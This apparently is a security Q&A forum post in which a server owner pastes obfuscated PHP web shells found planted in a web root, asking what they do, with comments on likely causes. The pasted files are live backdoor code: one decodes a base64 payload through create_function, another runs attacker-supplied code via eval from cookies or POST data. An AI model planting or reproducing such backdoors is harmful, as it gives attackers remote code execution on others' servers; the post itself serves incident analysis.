0

Every so often I go back and check our server and find random files uploaded to the domain root directory. They are seemingly cryptic and have names like 

css2.php              db_model.php          .htaccess             menu57.php            rss_feeder.class.php  stats21.php           title.php

This is the contents of one of them (db_model.php) but they all look similar. 

<?php

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91c2VfYWpheCwkZGVmYXVsdF9jaGFyc2V0LCRzb3J0Ow0KZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsNCg0KJGF1dGhfcGFzcyA9ICdmMzI0MmRjYzU5$
$array_name = "";
$ar = array(4,29,34,38,42,9,21,7,38,17,37,7,38);
foreach($ar as $t){
   $array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();

From another file, title.php:

<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ae767'] = "\x3e\x44\x36\x6d\xd\x73\x34\x49\x7b\x4c\x7a\x52\x5a\x5d\x2a\x74\x3f\x72\x6c\x50\x4f\x5e\x6f\x6a\x65\x68\x4a\x37\x3d\x48\x23\x9\x69\x4b\x55\x61\x42\x7d\x32$
$GLOBALS[$GLOBALS['ae767'][56].$GLOBALS['ae767'][92].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75]] = $GLOBALS['ae767'][91].$GLOBALS['ae767'][25].$GLOBALS['ae767'][17];
$GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][56].$GLOBALS['ae767'][56].$GLOBALS['ae767'][38].$GLOBALS['ae767'][82].$GLOBALS['ae767'][42].$GLOBALS['ae767'][24]] = $GLOBALS['ae767'][22].$GLOBALS['ae767'$
$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42]] = $GLOBALS['ae767'][5].$GLOBALS['ae767'][15].$GLOBALS['ae767'][17].$GLOBALS['ae767'][18].$GLOBALS['ae767'$
$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]] = $GLOBALS['ae767'$
$GLOBALS[$GLOBALS['ae767'][49].$GLOBALS['ae767'][27].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][35].$GLOBALS['ae767'][75]] = $GLOBALS['ae767'$
$GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][6].$GLOBALS['ae767'][82]] = $GLOBALS['ae767'][58].$GLOBALS['ae767']$
$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][2].$GLOBALS['ae767'][82]] = $GLOBALS['ae767'][62].$GLOBALS['ae767'][41].$GLOBALS['ae767'][5].$GLOBALS['ae767'][24].$GLOBALS['ae767']$
$GLOBALS[$GLOBALS['ae767'][49].$GLOBALS['ae767'][6].$GLOBALS['ae767'][92].$GLOBALS['ae767'][92].$GLOBALS['ae767'][82].$GLOBALS['ae767'][82].$GLOBALS['ae767'][2].$GLOBALS['ae767'][56]] = $GLOBALS['ae767']$
$GLOBALS[$GLOBALS['ae767'][81].$GLOBALS['ae767'][27].$GLOBALS['ae767'][56].$GLOBALS['ae767'][2].$GLOBALS['ae767'][6].$GLOBALS['ae767'][2]] = $GLOBALS['ae767'][5].$GLOBALS['ae767'][24].$GLOBALS['ae767'][1$
$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][91].$GLOBALS['ae767'][91].$GLOBALS['ae767'][66].$GLOBALS['ae767'][56].$GLOBALS['ae767'][35].$GLOBALS['ae767'][92].$GLOBALS['ae767'][83]] = $GLOBALS['ae767$
$GLOBALS[$GLOBALS['ae767'][24].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27]] = $GLOBALS['ae767'][10].$GLOBALS['ae767'$
$GLOBALS[$GLOBALS['ae767'][48].$GLOBALS['ae767'][42].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][66]] = $_POST;
$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][71].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][82].$GLOBALS['ae767'][91]] = $_COOKIE;
@$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]]($GLOBALS['ae767']$
@$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]]($GLOBALS['ae767']$
@$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]]($GLOBALS['ae767']$
@$GLOBALS[$GLOBALS['ae767'][81].$GLOBALS['ae767'][27].$GLOBALS['ae767'][56].$GLOBALS['ae767'][2].$GLOBALS['ae767'][6].$GLOBALS['ae767'][2]](0);

$z0503b8 = NULL;
$afb153 = NULL;

$GLOBALS[$GLOBALS['ae767'][81].$GLOBALS['ae767'][92].$GLOBALS['ae767'][35].$GLOBALS['ae767'][91].$GLOBALS['ae767'][2].$GLOBALS['ae767'][27]] = $GLOBALS['ae767'][75].$GLOBALS['ae767'][35].$GLOBALS['ae767'$
global $k5ac67;

function z629f($z0503b8, $mf97830)
{
    $t7aae05 = "";

    for ($u9ce42=0; $u9ce42<$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42]]($z0503b8);)
    {
        for ($w21eb399=0; $w21eb399<$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42]]($mf97830) && $u9ce42<$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767']$
        {
            $t7aae05 .= $GLOBALS[$GLOBALS['ae767'][56].$GLOBALS['ae767'][92].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75]]($GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][56].$GLOBALS['ae767'][56].$GLOBALS$
        }
    }

    return $t7aae05;
}

function a774bfe($z0503b8, $mf97830)
{
    global $k5ac67;

    return $GLOBALS[$GLOBALS['ae767'][24].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27]]($GLOBALS[$GLOBALS['ae767'][24$
}

foreach ($GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][71].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][82].$GLOBALS['ae767'][91]] as $mf97830=>$sf8707d0)
{
    $z0503b8 = $sf8707d0;
    $afb153 = $mf97830;
}

if (!$z0503b8)
{
    foreach ($GLOBALS[$GLOBALS['ae767'][48].$GLOBALS['ae767'][42].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][66]] as $mf97830=>$sf8707d0)
    {
        $z0503b8 = $sf8707d0;
        $afb153 = $mf97830;
    }
}

$z0503b8 = @$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][2].$GLOBALS['ae767'][82]]($GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][91].$GLOBALS['ae767'][91].$GLOBALS['ae767'][6$
if (isset($z0503b8[$GLOBALS['ae767'][35].$GLOBALS['ae767'][81]]) && $k5ac67==$z0503b8[$GLOBALS['ae767'][35].$GLOBALS['ae767'][81]])
{
    if ($z0503b8[$GLOBALS['ae767'][35]] == $GLOBALS['ae767'][32])
    {
        $u9ce42 = Array(
            $GLOBALS['ae767'][58].$GLOBALS['ae767'][40] => @$GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][6].$GLO$
            $GLOBALS['ae767'][5].$GLOBALS['ae767'][40] => $GLOBALS['ae767'][75].$GLOBALS['ae767'][85].$GLOBALS['ae767'][42].$GLOBALS['ae767'][60].$GLOBALS['ae767'][75],
        );
        echo @$GLOBALS[$GLOBALS['ae767'][49].$GLOBALS['ae767'][27].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][35].$GLOBALS['ae767'][75]]($u9c$
    }
    elseif ($z0503b8[$GLOBALS['ae767'][35]] == $GLOBALS['ae767'][24])
    {
        eval($z0503b8[$GLOBALS['ae767'][56]]);
    }
    exit();
}

Clearly we need to harden our Ubuntu installation to prevent this from happening over again. But what in the world does this code do?

kp123
  • 101
  • 1
    Depending on how up to date your server is, it's probably more likely that the real issue is a vulnerability in the website you're running, which won't be fixed by hardening the server it's running on. – AndrolGenhald Aug 11 '19 at 02:56
  • 2
    You seem surprisingly unconcerned about the fact that your server has been hacked multiple times. I would really try to stop that before you get sued for a data breach.... – Conor Mancone Aug 11 '19 at 04:09
  • I dont have an application running...no data, no breaches. The code was uploaded into an empty folder...hence the lack of "concern". I am in the process of deploying a new site to my server, so it's important that I fix this problem now so it never happens when my site is live. – kp123 Aug 11 '19 at 05:18

0 Answers0